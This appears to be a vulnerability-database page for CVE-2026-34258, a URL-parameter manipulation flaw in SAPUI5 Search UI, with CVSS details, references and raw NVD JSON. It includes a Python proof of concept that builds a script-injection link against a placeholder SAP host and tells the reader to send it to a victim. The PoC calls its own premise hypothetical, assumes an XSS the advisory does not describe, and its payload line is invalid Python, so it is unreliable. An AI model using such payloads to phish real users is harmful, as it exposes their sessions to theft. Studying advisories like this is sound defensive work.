CVE-2026-34258

Description

SAPUI5 (Search UI) allows an unauthenticated attacker to manipulate specific URL parameters on the Search UI to include malicious content. Successful exploitation may mislead victim users into clicking and accessing attacker-controlled pages rendered by the application. This vulnerability has a low impact on confidentiality with no effect on the integrity and availability of the application.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAPUI5 (Search UI) (具体版本请参考SAP Security Patch Day及Note 3726583)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-34258
# This script demonstrates how a malicious URL could be generated.

import urllib.parse

def generate_malicious_url(base_url, vulnerable_param, payload):
    """Generates a malicious URL exploiting the parameter manipulation."""
    params = {vulnerable_param: payload}
    query_string = urllib.parse.urlencode(params)
    return f"{base_url}?{query_string}"

if __name__ == "__main__":
    # Example target endpoint (hypothetical based on SAPUI5 Search UI behavior)
    target = "https://victim-sap-system.com/sap/bc/ui5_ui5/sap/zsearch_ui/index.html"
    
    # The vulnerable parameter might be related to search query or navigation
    # Payload attempts to inject a script to display an alert or steal cookies
    malicious_payload = ""><script>alert('CVE-2026-34258 Exploited')</script><!--"
    
    exploit_url = generate_malicious_url(target, "searchTerm", malicious_payload)
    
    print("[+] Potential Exploit URL Generated:")
    print(exploit_url)
    print("\n[!] Send this link to a victim. If they click and the page renders, the script executes.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34258
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34258
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34258/
[4] VulDB https://vuldb.com/cve/CVE-2026-34258
[5] https://me.sap.com/notes/3726583
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34258", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:11.247", "lastModified": "2026-05-12T03:16:11.247", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAPUI5 (Search UI) allows an unauthenticated attacker to manipulate specific URL parameters on the Search UI to include malicious content. Successful exploitation may mislead victim users into clicking and accessing attacker-controlled pages rendered by the application. This vulnerability has a low impact on confidentiality with no effect on the integrity and availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "references": [{"url": "https://me.sap.com/notes/3726583", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}